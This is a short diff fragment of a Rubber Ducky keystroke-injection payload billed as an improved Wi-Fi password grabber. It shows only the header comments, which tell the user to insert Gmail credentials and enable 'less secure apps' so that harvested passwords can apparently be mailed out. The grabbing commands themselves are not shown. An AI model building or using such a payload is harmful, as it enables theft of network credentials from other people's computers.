abhinavvv03/Rubber-Duckey/Payload-Improved-Wi-Fi-Password-Grabber.md

 REM Author      : Jacob Collins
 REM Version     : 3
 REM Description : An improved version of the "WiFi password grabber" by Siem.
 It is a bit faster, and shorter.
-REM DISCLAIMER  : Make sure to replace all instances of "YOUREMAIL@gmail.com" (without quotes), with your actual e-mail (MUST BE G-MAIL!), and "PASSWORD" (without quotes) with your password.
+REM DISCLAIMER  : Make sure to replace all instances of "YOUREMAIL@gmail.com" (without quotes), with your actual e-mail (MUST BE G-MAIL!), and "YOURPASSWORD" (without quotes) with your password.
 REM DISCLAIMER  : Make sure to enable "Allow less secure apps".
 Here is the link: https://myaccount.google.com/lesssecureapps DELAY 1000
 REM --------> Open the run dialog